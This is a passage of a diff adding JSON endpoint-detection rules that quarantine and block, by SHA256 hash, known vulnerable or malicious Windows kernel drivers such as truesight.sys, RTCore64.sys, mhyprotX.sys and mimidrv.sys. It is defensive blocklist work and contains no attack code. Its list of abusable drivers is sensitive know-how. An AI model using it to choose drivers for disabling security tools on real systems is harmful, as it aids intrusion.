+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821726Z",
+ "creation_date": "2026-03-23T11:45:31.821728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821733Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ad43b87715587451f01936741b75678a2b35278a2864d72c83fcf2e48e68f7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3c47005-de1e-5b12-920d-3de043e9d250",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498837Z",
+ "creation_date": "2026-03-23T11:45:31.498840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a9cca94ebc65c44bcf1a89b9936d2347e18f9f9ce3d40a3c71ae18c49e9b600",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3c92310-8cd2-5a0c-8a03-1a2596d87198",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499923Z",
+ "creation_date": "2026-03-23T11:45:31.499926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27ad30aeba918e35b292c839c3f844cd8b1d6b2ec4d38c77478a7e3a9bd23a95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3d61bd3-ab38-584b-81c8-68fd93ecab0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603922Z",
+ "creation_date": "2026-03-23T11:45:29.603925Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.603931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1ad1af005bd78e1ea1d1eef5041c2bdb46f60a9baa60f4b7be21f9603f99df0",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3e09ec0-ac09-51b7-a364-0ec916a482fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155066Z",
+ "creation_date": "2026-03-23T11:45:31.155068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155073Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ead5ac6e9b61c92473a152c843a43a028b26485b6287244045fe5c78d34bb832",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3e810ca-87a4-5f94-ac0d-6ae126ccfbb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820390Z",
+ "creation_date": "2026-03-23T11:45:30.820392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c0a36990f7eef89b2d5f454b6452b6df1304609903f31f475502e4050241dd8",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3e81b63-118e-5135-b111-c99a68336455",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826667Z",
+ "creation_date": "2026-03-23T11:45:31.826669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4da389eed69a4292233f7ea4929fb1caef53326e36dfb9bb97f4aecac6b2ed6a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3fe41d5-1c84-5f31-8360-83caf045fda0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826402Z",
+ "creation_date": "2026-03-23T11:45:31.826404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e1c198d16341274b2a4106a7e798856889f1402a41503a763e00cebfcf1c05a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c40ebfd8-61a3-5496-9914-c1e1a99f63d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477162Z",
+ "creation_date": "2026-03-23T11:45:31.477165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "402ebccaad7f4e5c2df2063d2ba33beb15f09c7654bb092e5a2bb93b0660d792",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c417fc94-d1f1-5e75-9de9-2f254abf01b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144277Z",
+ "creation_date": "2026-03-23T11:45:32.144280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a61add64bbb08af8576aac592fdafe7114b940878babb3ae90bfde26f315187",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c41f1112-97b7-5b6c-bfdf-154fd3069c8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822033Z",
+ "creation_date": "2026-03-23T11:45:31.822036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea3b808d4eb63d842cfd750ab5d7f7cca460b4fc63b43071af6384a4f1a40516",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c44901e4-5be5-53ad-8bcf-3e62df6c08d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827053Z",
+ "creation_date": "2026-03-23T11:45:30.827055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ab90e068d05da1a25d846ce1556bf26f62df1afb62ee65096c74009a0abc4db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c44cb6de-e19e-59d5-973c-0243ce2ce4eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823986Z",
+ "creation_date": "2026-03-23T11:45:30.823988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0b5d5d75115c273df34b4f496d8a1c401b94c850d9fe0bb8d82d9777d141759",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c45bd53d-9c85-5474-824a-95127c748ef5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495566Z",
+ "creation_date": "2026-03-23T11:45:31.495568Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495574Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61161913cb2ceb5b103e0dbd79de796a09695f43d8f12d15a674ac88b46a3b75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c460552c-425e-5fc9-a863-3814a04b6d11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148347Z",
+ "creation_date": "2026-03-23T11:45:31.148349Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88189a4c2b9102a0e80c127cb8441f4034273c91420075edc666622fdbde9940",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c463bb53-8dd8-516e-a5c3-73911e30bd78",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475273Z",
+ "creation_date": "2026-03-23T11:45:30.475276Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475285Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3db84cbf299307b1d3500b50355cf35f63d69c6c56d117335fbef7c84ddcc09b",
+ "comment": "Malicious Kernel Driver (aka e29f6311ae87542b3d693c1f38e4e3ad.sys) [https://www.loldrivers.io/drivers/c00f818c-1c90-4b47-bc29-fb949f6efb65/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c468444b-7cc0-51e9-ac85-e4c6a5b37681",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607883Z",
+ "creation_date": "2026-03-23T11:45:29.607885Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e50b25d94c1771937b2f632e10eea875ac6b19c57da703d52e23ad2b6299f0ae",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c46b4bc4-5dfe-527b-91d4-dffe3553a51b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828494Z",
+ "creation_date": "2026-03-23T11:45:31.828496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828502Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a1808733154e92fbe1ca580ef6b886a52e1720461b0b537b5bbe601e07ae55b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c47402b7-6b03-5296-b5b3-89472fde6735",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611926Z",
+ "creation_date": "2026-03-23T11:45:29.611928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad2477632b9b07588cfe0e692f244c05fa4202975c1fe91dd3b90fa911ac6058",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c47e7ef3-4951-5449-b3ee-6713d2678478",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973602Z",
+ "creation_date": "2026-03-23T11:45:29.973604Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "478d855b648ef4501d3b08b3b10e94076ac67546b0ce86b454324f1bf9a78aa0",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c48d2d05-059f-5645-8640-0bf2c53f499a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469037Z",
+ "creation_date": "2026-03-23T11:45:30.469041Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fe18adf87e3330799361d49e811c7a35a497423833ad83573588b7878df286c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4a1860d-0abe-5d07-baa9-0a0cf1e38252",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157839Z",
+ "creation_date": "2026-03-23T11:45:31.157864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4808b39a5d295c1fb4c10e89f3bfc53f5e049dd1f8933a2e48364036c74214ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c4a3ea73-55ee-5f20-bbeb-d0c43f35f065",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814660Z",
+ "creation_date": "2026-03-23T11:45:31.814663Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
